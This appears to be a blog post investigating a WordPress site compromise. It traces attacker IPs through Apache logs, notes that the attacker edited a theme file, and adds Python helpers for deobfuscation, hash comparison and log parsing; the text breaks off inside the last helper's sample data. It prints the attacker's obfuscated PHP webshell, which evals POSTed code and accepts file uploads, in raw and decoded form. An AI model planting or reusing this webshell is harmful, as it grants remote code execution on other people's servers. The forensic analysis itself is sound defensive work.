Investigating a Web Attack (and Lessons Learned)

On 18 May 2018 I happened to notice a strange string of digits on my blog's 404 page. Part of it was hidden behind some HTML elements, but I recovered it with the browser's developer tools: 8194460.

Then I did something very wrong: from within WordPress I updated both WordPress itself and the official theme, which directly destroyed a lot of evidence.


Deobfuscation

I connected to the host over SSH and found an extra directory named assets in the site root; a fresh WordPress download does not contain this directory. It held a single file (assets/picture/accesson.php) with the following content:

<?php echo 7457737+736723;$raPo_rZluoE=base64_decode("Y".chr(109)."F".chr(122).chr(90)."T".chr(89).chr(48).chr(88)."2"."R"."l"."Y".chr(50)."9".chr(107)."Z".chr(81)."="."=");$ydSJPtnwrSv=base64_decode(chr(89)."2".chr(57).chr(119).chr(101).chr(81).chr(61)."=");eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87)."Q".chr(61))]));if($_POST[base64_decode("d".chr(88).chr(65)."=")] == base64_decode("d"."X".chr(65).chr(61))){@$ydSJPtnwrSv($_FILES[base64_decode(chr(90)."m"."l"."s".chr(90)."Q"."=".chr(61))][base64_decode(chr(100).chr(71).chr(49)."w"."X".chr(50)."5".chr(104)."b".chr(87)."U".chr(61))],$_FILES[base64_decode("Z".chr(109)."l"."s".chr(90)."Q".chr(61).chr(61))][base64_decode(chr(98)."m"."F".chr(116)."Z".chr(81).chr(61)."=")]);}; ?>

It contains base64_decode() and eval(), and judging by its length it is most likely a small dropper (a trojan loader) or a Webshell without an interactive UI.

It uses chr() to generate specific ASCII characters, which defeats many unPHP tools: most of them only target functions related to base64_decode, gzip and eval.

After deobfuscation it reads as follows (the commented lines give the fully resolved result):

<?php 
echo 7457737+736723;

// $raPo_rZluoE = "base64_decode"
$raPo_rZluoE=base64_decode("YmFzZTY0X2RlY29kZQ==");

// $ydSJPtnwrSv = "copy"
$ydSJPtnwrSv=base64_decode("Y29weQ==");

// eval(base64_decode($_POST['id']));
eval($raPo_rZluoE($_POST[base64_decode("aWQ=")]));

// if($_POST['up'] == 'up') {
//     @copy($_FILES['file']['tmp_name'], $_FILES['file']['name']);
// }
if($_POST[base64_decode("dXA=")] == base64_decode("dXA=")){
	@$ydSJPtnwrSv($_FILES[base64_decode("ZmlsZQ==")][base64_decode("dG1wX25hbWU=")],$_FILES[base64_decode("ZmlsZQ==")][base64_decode("bmFtZQ==")]);
};
?>

So it has the following functions:

  1. On a POST request whose body contains id, the corresponding value is base64-decoded and executed as PHP code.
  2. On a POST request whose body contains up with the value up, an uploaded file is accepted and copied to the specified path.
  3. The echo 7457737+736723; on the first line probably serves as a marker. Note that 7457737+736723=8194460.
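
Stripping the chr() layer by hand is tedious, and it is exactly what literal-matching unPHP tools skip. The following Python helper is an added example written for this post (not a tool the author used, and not part of any existing scanner): it statically concatenates the string literals and chr() bytes inside each base64_decode(...) call, decodes the result, and rewrites the source with the plain literals; indicators() gives the kind of triage counts a scanner would key on. SAMPLE is the accesson.php content shown above.

```python
import base64
import re

# Hypothetical helper for this post: statically evaluates PHP expressions of the form
#   base64_decode("Y".chr(109)."F" ... )
# by concatenating string literals and chr() bytes, then base64-decoding.

# One base64_decode( ... ) call whose argument is only "..." literals and chr(N)
# joined with the PHP concatenation operator '.'
_ATOM = r'(?:"[^"]*"|chr\(\s*\d+\s*\))'
_CALL_RE = re.compile(r'base64_decode\(\s*(' + _ATOM + r'(?:\s*\.\s*' + _ATOM + r')*)\s*\)')
_ATOM_RE = re.compile(r'"([^"]*)"|chr\(\s*(\d+)\s*\)')

# The obfuscated file quoted above (inert text here; it is only parsed, never executed).
SAMPLE = r'''<?php echo 7457737+736723;$raPo_rZluoE=base64_decode("Y".chr(109)."F".chr(122).chr(90)."T".chr(89).chr(48).chr(88)."2"."R"."l"."Y".chr(50)."9".chr(107)."Z".chr(81)."="."=");$ydSJPtnwrSv=base64_decode(chr(89)."2".chr(57).chr(119).chr(101).chr(81).chr(61)."=");eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87)."Q".chr(61))]));if($_POST[base64_decode("d".chr(88).chr(65)."=")] == base64_decode("d"."X".chr(65).chr(61))){@$ydSJPtnwrSv($_FILES[base64_decode(chr(90)."m"."l"."s".chr(90)."Q"."=".chr(61))][base64_decode(chr(100).chr(71).chr(49)."w"."X".chr(50)."5".chr(104)."b".chr(87)."U".chr(61))],$_FILES[base64_decode("Z".chr(109)."l"."s".chr(90)."Q".chr(61).chr(61))][base64_decode(chr(98)."m"."F".chr(116)."Z".chr(81).chr(61)."=")]);}; ?>'''


def php_concat(expr: str) -> str:
    """Evaluate a PHP concatenation made only of string literals and chr() calls."""
    parts = []
    for lit, code in _ATOM_RE.findall(expr):
        parts.append(lit if code == "" else chr(int(code)))
    return "".join(parts)


def decode_call(expr: str) -> str:
    """Resolve one base64_decode(...) argument to the plaintext it hides."""
    return base64.b64decode(php_concat(expr)).decode("latin-1")


def decoded_strings(source: str) -> list:
    """All strings hidden behind static base64_decode(...) calls, in order of appearance."""
    return [decode_call(m.group(1)) for m in _CALL_RE.finditer(source)]


def simplify(source: str) -> str:
    """Rewrite the source with each static base64_decode(...) replaced by a PHP literal."""
    def repl(m):
        s = decode_call(m.group(1)).replace("\\", "\\\\").replace("'", "\\'")
        return "'" + s + "'"
    return _CALL_RE.sub(repl, source)


def indicators(source: str) -> dict:
    """Rough triage counts: chr() plus eval plus a variable-function call
    ($var(...)) is the combination that defeats literal-only matching."""
    return {
        "chr_calls": len(re.findall(r'\bchr\(', source)),
        "base64_decode": len(re.findall(r'\bbase64_decode\(', source)),
        "eval": len(re.findall(r'\beval\(', source)),
        "superglobals": len(re.findall(r'\$_(?:POST|GET|FILES|REQUEST|COOKIE)\b', source)),
        "variable_function_call": bool(re.search(r'\$\w+\(', source)),
    }


if __name__ == "__main__":
    print(decoded_strings(SAMPLE))
    print(indicators(SAMPLE))
    print(simplify(SAMPLE))
```

Running it on SAMPLE recovers base64_decode, copy, id, up, file, tmp_name and name, which is the same mapping worked out by hand above; the rewritten source still calls the two functions through variables, so eval() and copy() remain one indirection away and have to be read off the resolved literals.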

Next I started checking the WordPress files, roughly as follows:

  1. Delete all unused themes.
  2. Compare the sha256 of each file in the site directory against the official zip package.
  3. Manually audit the code of the plugins.

No other tampered files were found, which is because I had already deleted some themes and updated (overwritten) the theme in use.
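
Step 2 above (compare each file's sha256 with the official zip) is easy to script. The following Python is an added example written for this post, not the author's own tooling: it hashes every file in the official release zip (stripping the top-level wordpress/ folder the zip uses) and every file under the site root, then reports modified, extra and missing paths. demo() builds a small constructed fixture instead of touching a real site so the code runs offline; every file name and content in the fixture is made up.

```python
import hashlib
import os
import tempfile
import zipfile


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def hashes_from_zip(zip_path: str, strip_prefix: str = "wordpress/") -> dict:
    """Map relative path -> sha256 for every file in the official release zip.
    The official zip puts everything under a top-level 'wordpress/' folder,
    which is stripped so paths line up with the site root."""
    hashes = {}
    with zipfile.ZipFile(zip_path) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            rel = info.filename
            if rel.startswith(strip_prefix):
                rel = rel[len(strip_prefix):]
            hashes[rel] = sha256_bytes(zf.read(info))
    return hashes


def hashes_from_dir(root: str) -> dict:
    """Map relative path -> sha256 for every file below the site root."""
    hashes = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        if rel_dir == ".":
            rel_dir = ""
        for name in filenames:
            rel = os.path.join(rel_dir, name).replace(os.sep, "/")
            with open(os.path.join(dirpath, name), "rb") as f:
                hashes[rel] = sha256_bytes(f.read())
    return hashes


def compare(site: dict, official: dict, ignore_prefixes=("wp-content/uploads/",)) -> dict:
    """modified: in both, different hash (e.g. a tampered theme file).
    extra: on the site but in no release (dropped files, but also every
    third-party theme/plugin, which still need the manual audit of step 3).
    missing: shipped by the release but absent from the site."""
    modified = sorted(p for p in site if p in official and site[p] != official[p])
    extra = sorted(p for p in site if p not in official and not p.startswith(ignore_prefixes))
    missing = sorted(p for p in official if p not in site)
    return {"modified": modified, "extra": extra, "missing": missing}


def demo() -> dict:
    """Constructed fixture: a fake release zip and a fake site tree in a temp dir."""
    with tempfile.TemporaryDirectory() as tmp:
        official_files = {
            "wordpress/index.php": b"<?php require 'wp-blog-header.php';\n",
            "wordpress/wp-content/themes/twentysixteen/404.php": b"<?php get_header(); ?>\n",
            "wordpress/wp-includes/version.php": b"<?php $wp_version = 'x.y.z';\n",
        }
        zip_path = os.path.join(tmp, "wordpress.zip")
        with zipfile.ZipFile(zip_path, "w") as zf:
            for name, data in official_files.items():
                zf.writestr(name, data)
        site = os.path.join(tmp, "site")
        site_files = {
            "index.php": official_files["wordpress/index.php"],
            # tampered theme file: a marker echo prepended, like the digits on the 404 page
            "wp-content/themes/twentysixteen/404.php": b"<?php echo 7457737+736723; get_header(); ?>\n",
            # a dropped file that no release ships
            "assets/picture/accesson.php": b"<?php /* placeholder for the dropped file */ ?>\n",
            # uploads are never in the zip and are ignored by default
            "wp-content/uploads/2018/05/photo.jpg": b"\xff\xd8\xff",
        }
        for rel, data in site_files.items():
            full = os.path.join(site, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as f:
                f.write(data)
        return compare(hashes_from_dir(site), hashes_from_zip(zip_path))


if __name__ == "__main__":
    print(demo())
```

Against a real install, hashes_from_dir() is pointed at the site root and hashes_from_zip() at the matching release zip; the "extra" list is where a dropped assets/… file shows up, while a tampered theme file appears under "modified" only as long as the theme has not been overwritten by an update, which is the evidence lost in this case.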


Log analysis

Since logrotate compresses log files older than 3 days, I copied the logs for this site into a separate folder and decompressed them:

$ cd ~
$ mkdir log_blog
$ cp /var/log2/apache2/hardrain980.com.access.log* ~/log_blog
$ cd ~/log_blog
$ gunzip ./*.gz

About accesson.php

$ grep -rnw ./ -Ee '^(GET|POST).*accesson' -B1 -A2

./hardrain980.com.access.log.2-1371-77.111.175.75(Zalaegerszeg,HU) [17/May/2018:08:30:22 +0000] - https 404 38120Bytes
./hardrain980.com.access.log.2:1372:GET /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.2-1373-REF:-
./hardrain980.com.access.log.2-1374-UA:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/62.0.3202.89 Chrome/62.0.3202.89 Safari/537.36
--
./hardrain980.com.access.log.2-1376-77.111.175.75(Zalaegerszeg,HU) [17/May/2018:08:30:25 +0000] - https 404 38174Bytes
./hardrain980.com.access.log.2:1377:POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.2-1378-REF:http://ya.ru/
./hardrain980.com.access.log.2-1379-UA:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/62.0.3202.89 Chrome/62.0.3202.89 Safari/537.36
--
./hardrain980.com.access.log.2-1381-77.111.175.75(Zalaegerszeg,HU) [17/May/2018:08:30:28 +0000] - https 404 4511Bytes
./hardrain980.com.access.log.2:1382:POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.2-1383-REF:http://ya.ru/
./hardrain980.com.access.log.2-1384-UA:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/62.0.3202.89 Chrome/62.0.3202.89 Safari/537.36
--
./hardrain980.com.access.log.2-1386-77.111.175.75(Zalaegerszeg,HU) [17/May/2018:08:30:29 +0000] - https 404 38174Bytes
./hardrain980.com.access.log.2:1387:POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.2-1388-REF:http://ya.ru/
./hardrain980.com.access.log.2-1389-UA:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/62.0.3202.89 Chrome/62.0.3202.89 Safari/537.36
--
./hardrain980.com.access.log.2-1391-77.111.175.75(Zalaegerszeg,HU) [17/May/2018:08:30:31 +0000] - https 404 38261Bytes
./hardrain980.com.access.log.2:1392:POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.2-1393-REF:http://ya.ru/
./hardrain980.com.access.log.2-1394-UA:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/62.0.3202.89 Chrome/62.0.3202.89 Safari/537.36
--
./hardrain980.com.access.log.2-1396-77.111.175.75(Zalaegerszeg,HU) [17/May/2018:08:30:32 +0000] - https 404 38895Bytes
./hardrain980.com.access.log.2:1397:POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.2-1398-REF:http://ya.ru/
./hardrain980.com.access.log.2-1399-UA:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/62.0.3202.89 Chrome/62.0.3202.89 Safari/537.36
--
./hardrain980.com.access.log.2-1401-77.111.175.75(Zalaegerszeg,HU) [17/May/2018:08:30:34 +0000] - https 404 35709Bytes
./hardrain980.com.access.log.2:1402:POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.2-1403-REF:http://ya.ru/
./hardrain980.com.access.log.2-1404-UA:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/62.0.3202.89 Chrome/62.0.3202.89 Safari/537.36
--
./hardrain980.com.access.log.2-5766-77.111.175.75(Zalaegerszeg,HU) [17/May/2018:21:17:11 +0000] - http 301 636Bytes
./hardrain980.com.access.log.2:5767:GET /assets/images/accesson.php HTTP/1.1
./hardrain980.com.access.log.2-5768-REF:-
./hardrain980.com.access.log.2-5769-UA:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/60.0.3112.78 Chrome/60.0.3112.78 Safari/537.36
--
./hardrain980.com.access.log.2-5771-77.111.175.75(Zalaegerszeg,HU) [17/May/2018:21:17:15 +0000] - https 200 3825Bytes
./hardrain980.com.access.log.2:5772:GET /assets/images/accesson.php HTTP/1.1
./hardrain980.com.access.log.2-5773-REF:-
./hardrain980.com.access.log.2-5774-UA:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/60.0.3112.78 Chrome/60.0.3112.78 Safari/537.36
--
./hardrain980.com.access.log.4-2286-77.111.150.118(-,HU) [15/May/2018:11:10:44 +0000] - https 404 43403Bytes
./hardrain980.com.access.log.4:2287:GET /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.4-2288-REF:https://hardrain980.com/wp-content/themes/twentysixteen/404.php
./hardrain980.com.access.log.4-2289-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4-2291-77.111.150.118(-,HU) [15/May/2018:11:10:46 +0000] - https 404 43232Bytes
./hardrain980.com.access.log.4:2292:POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.4-2293-REF:https://hardrain980.com/wp-content/themes/twentysixteen/accesson.php
./hardrain980.com.access.log.4-2294-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4-2296-77.111.150.118(-,HU) [15/May/2018:11:10:54 +0000] - https 404 43403Bytes
./hardrain980.com.access.log.4:2297:POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.4-2298-REF:https://hardrain980.com/wp-content/themes/twentysixteen/accesson.php
./hardrain980.com.access.log.4-2299-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4-2301-77.111.150.118(-,HU) [15/May/2018:11:10:58 +0000] - https 404 43403Bytes
./hardrain980.com.access.log.4:2302:POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.4-2303-REF:https://hardrain980.com/wp-content/themes/twentysixteen/accesson.php
./hardrain980.com.access.log.4-2304-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4-2306-77.111.150.118(-,HU) [15/May/2018:11:11:02 +0000] - https 404 43403Bytes
./hardrain980.com.access.log.4:2307:POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.4-2308-REF:https://hardrain980.com/wp-content/themes/twentysixteen/accesson.php
./hardrain980.com.access.log.4-2309-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4-2311-77.111.150.118(-,HU) [15/May/2018:11:11:06 +0000] - https 404 43403Bytes
./hardrain980.com.access.log.4:2312:POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.4-2313-REF:https://hardrain980.com/wp-content/themes/twentysixteen/accesson.php
./hardrain980.com.access.log.4-2314-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36

So only two IPs ever accessed this file (77.111.150.118 and 77.111.175.75).

I then used the same method (grep -rnw ./ -Ee '^(77\.111\.150\.118|77\.111\.175\.75)' -A3) to search for everything these two IPs did.

About 77.111.150.118 and 77.111.175.75

$ grep -rnw ./ -Ee '^(77\.111\.150\.118|77\.111\.175\.75)' -A3

./hardrain980.com.access.log.6:831:77.111.175.75(Zalaegerszeg,HU) [13/May/2018:08:38:44 +0000] - http 301 734Bytes
./hardrain980.com.access.log.6-832-GET /wp-content/plugins/woocommerce-catalog-enquiry/assets/frontend/js/chosen.js HTTP/1.1
./hardrain980.com.access.log.6-833-REF:-
./hardrain980.com.access.log.6-834-UA:Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2912.16 Safari/537.36
--
./hardrain980.com.access.log.6:836:77.111.175.75(Zalaegerszeg,HU) [13/May/2018:08:38:48 +0000] - http 301 734Bytes
./hardrain980.com.access.log.6-837-GET /wp-content/plugins/woocommerce-catalog-enquiry/assets/frontend/js/chosen.js HTTP/1.1
./hardrain980.com.access.log.6-838-REF:-
./hardrain980.com.access.log.6-839-UA:Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; Win64; x64; Trident/5.0)

This shows that 77.111.175.75 started scanning for vulnerabilities as early as 13 May: it requested a path belonging to a plugin that does not exist on my WordPress.

About cperpage=1

Another action by 77.111.150.118 caught my attention: it repeatedly requested the home page with the query parameter cperpage=1 appended, which is highly abnormal:

./hardrain980.com.access.log.4:2221:77.111.150.118(-,HU) [15/May/2018:11:10:22 +0000] - https 301 1367Bytes
./hardrain980.com.access.log.4-2222-GET /index.php?cperpage=1 HTTP/1.1
./hardrain980.com.access.log.4-2223-REF:https://hardrain980.com/
./hardrain980.com.access.log.4-2224-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2226:77.111.150.118(-,HU) [15/May/2018:11:10:24 +0000] - https 200 20331Bytes
./hardrain980.com.access.log.4-2227-GET /?cperpage=1 HTTP/1.1
./hardrain980.com.access.log.4-2228-REF:https://hardrain980.com/
./hardrain980.com.access.log.4-2229-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2231:77.111.150.118(-,HU) [15/May/2018:11:10:25 +0000] - https 301 597Bytes
./hardrain980.com.access.log.4-2232-GET /index.php?cperpage=1 HTTP/1.1
./hardrain980.com.access.log.4-2233-REF:https://hardrain980.com/?cperpage=1
./hardrain980.com.access.log.4-2234-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2236:77.111.150.118(-,HU) [15/May/2018:11:10:26 +0000] - https 200 20333Bytes
./hardrain980.com.access.log.4-2237-GET /?cperpage=1 HTTP/1.1
./hardrain980.com.access.log.4-2238-REF:https://hardrain980.com/?cperpage=1
./hardrain980.com.access.log.4-2239-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2241:77.111.150.118(-,HU) [15/May/2018:11:10:34 +0000] - https 301 768Bytes
./hardrain980.com.access.log.4-2242-GET /index.php?cperpage=1 HTTP/1.1
./hardrain980.com.access.log.4-2243-REF:https://hardrain980.com/?cperpage=1
./hardrain980.com.access.log.4-2244-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2246:77.111.150.118(-,HU) [15/May/2018:11:10:35 +0000] - https 200 20334Bytes
./hardrain980.com.access.log.4-2247-GET /?cperpage=1 HTTP/1.1
./hardrain980.com.access.log.4-2248-REF:https://hardrain980.com/?cperpage=1
./hardrain980.com.access.log.4-2249-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36

It then actually got into the admin backend, and judging by its behaviour, once inside it edited the 404.php of the theme I was using at the time and dropped another accesson.php in the theme's root directory. This explains the strange digits on the 404 page.

./hardrain980.com.access.log.4:2251:77.111.150.118(-,HU) [15/May/2018:11:10:36 +0000] - https 200 14980Bytes
./hardrain980.com.access.log.4-2252-GET /wp-admin/theme-editor.php?file=404.php HTTP/1.1
./hardrain980.com.access.log.4-2253-REF:https://hardrain980.com/?cperpage=1
./hardrain980.com.access.log.4-2254-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2266:77.111.150.118(-,HU) [15/May/2018:11:10:38 +0000] - https 302 715Bytes
./hardrain980.com.access.log.4-2267-POST /wp-admin/theme-editor.php HTTP/1.1
./hardrain980.com.access.log.4-2268-REF:https://hardrain980.com/wp-admin/theme-editor.php?file=404.php
./hardrain980.com.access.log.4-2269-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2271:77.111.150.118(-,HU) [15/May/2018:11:10:39 +0000] - https 200 14570Bytes
./hardrain980.com.access.log.4-2272-GET /wp-admin/theme-editor.php?a=1&theme=twentysixteen&file=404.php HTTP/1.1
./hardrain980.com.access.log.4-2273-REF:https://hardrain980.com/wp-admin/theme-editor.php?file=404.php
./hardrain980.com.access.log.4-2274-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2276:77.111.150.118(-,HU) [15/May/2018:11:10:40 +0000] - https 500 513Bytes
./hardrain980.com.access.log.4-2277-GET /wp-content/themes/twentysixteen/404.php HTTP/1.1
./hardrain980.com.access.log.4-2278-REF:https://hardrain980.com/wp-admin/theme-editor.php?a=1&theme=twentysixteen&file=404.php
./hardrain980.com.access.log.4-2279-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2281:77.111.150.118(-,HU) [15/May/2018:11:10:42 +0000] - https 500 672Bytes
./hardrain980.com.access.log.4-2282-POST /wp-content/themes/twentysixteen/404.php HTTP/1.1
./hardrain980.com.access.log.4-2283-REF:https://hardrain980.com/wp-content/themes/twentysixteen/404.php
./hardrain980.com.access.log.4-2284-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2286:77.111.150.118(-,HU) [15/May/2018:11:10:44 +0000] - https 404 43403Bytes
./hardrain980.com.access.log.4-2287-GET /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.4-2288-REF:https://hardrain980.com/wp-content/themes/twentysixteen/404.php
./hardrain980.com.access.log.4-2289-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2291:77.111.150.118(-,HU) [15/May/2018:11:10:46 +0000] - https 404 43232Bytes
./hardrain980.com.access.log.4-2292-POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.4-2293-REF:https://hardrain980.com/wp-content/themes/twentysixteen/accesson.php
./hardrain980.com.access.log.4-2294-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2296:77.111.150.118(-,HU) [15/May/2018:11:10:54 +0000] - https 404 43403Bytes
./hardrain980.com.access.log.4-2297-POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.4-2298-REF:https://hardrain980.com/wp-content/themes/twentysixteen/accesson.php
./hardrain980.com.access.log.4-2299-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2301:77.111.150.118(-,HU) [15/May/2018:11:10:58 +0000] - https 404 43403Bytes
./hardrain980.com.access.log.4-2302-POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.4-2303-REF:https://hardrain980.com/wp-content/themes/twentysixteen/accesson.php
./hardrain980.com.access.log.4-2304-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2306:77.111.150.118(-,HU) [15/May/2018:11:11:02 +0000] - https 404 43403Bytes
./hardrain980.com.access.log.4-2307-POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.4-2308-REF:https://hardrain980.com/wp-content/themes/twentysixteen/accesson.php
./hardrain980.com.access.log.4-2309-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
--
./hardrain980.com.access.log.4:2311:77.111.150.118(-,HU) [15/May/2018:11:11:06 +0000] - https 404 43403Bytes
./hardrain980.com.access.log.4-2312-POST /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
./hardrain980.com.access.log.4-2313-REF:https://hardrain980.com/wp-content/themes/twentysixteen/accesson.php
./hardrain980.com.access.log.4-2314-UA:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2896.70 Safari/537.36
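
The grep pivot above (find every IP that touched accesson.php, then pull all requests from those IPs) and the theme-editor-then-direct-request sequence in the last excerpt can both be expressed as a small parser plus two rules. This Python code is an added example, not part of the original post. It assumes the four-line record layout visible in the grep output with one blank line between records (inferred from the line numbers, which skip one line between entries); SAMPLE_LOG is constructed from entries quoted above plus one unrelated visitor using an RFC 5737 documentation address, with User-Agent strings shortened.

```python
import re
from datetime import datetime, timedelta

# Record layout assumed for this example (the post's custom Apache format):
#   IP(geo) [dd/Mon/yyyy:HH:MM:SS +0000] - scheme status NNNBytes
#   METHOD /path?query HTTP/1.1
#   REF:<referer>
#   UA:<user agent>
#   <blank line>
_HEAD_RE = re.compile(r'^(\S+?)\((.*?)\) \[(.+?)\] - (\S+) (\d{3}) (\d+)Bytes$')
_REQ_RE = re.compile(r'^(\S+) (\S+) HTTP/[\d.]+$')

# Constructed sample: entries from the post plus one benign visitor (198.51.100.7).
SAMPLE_LOG = """\
77.111.150.118(-,HU) [15/May/2018:11:10:24 +0000] - https 200 20331Bytes
GET /?cperpage=1 HTTP/1.1
REF:https://hardrain980.com/
UA:Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/55.0.2896.70

77.111.150.118(-,HU) [15/May/2018:11:10:38 +0000] - https 302 715Bytes
POST /wp-admin/theme-editor.php HTTP/1.1
REF:https://hardrain980.com/wp-admin/theme-editor.php?file=404.php
UA:Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/55.0.2896.70

77.111.150.118(-,HU) [15/May/2018:11:10:40 +0000] - https 500 513Bytes
GET /wp-content/themes/twentysixteen/404.php HTTP/1.1
REF:https://hardrain980.com/wp-admin/theme-editor.php?a=1&theme=twentysixteen&file=404.php
UA:Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/55.0.2896.70

77.111.150.118(-,HU) [15/May/2018:11:10:44 +0000] - https 404 43403Bytes
GET /wp-content/themes/twentysixteen/accesson.php HTTP/1.1
REF:https://hardrain980.com/wp-content/themes/twentysixteen/404.php
UA:Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/55.0.2896.70

198.51.100.7(-,ZZ) [16/May/2018:09:00:00 +0000] - https 200 20000Bytes
GET /index.php HTTP/1.1
REF:-
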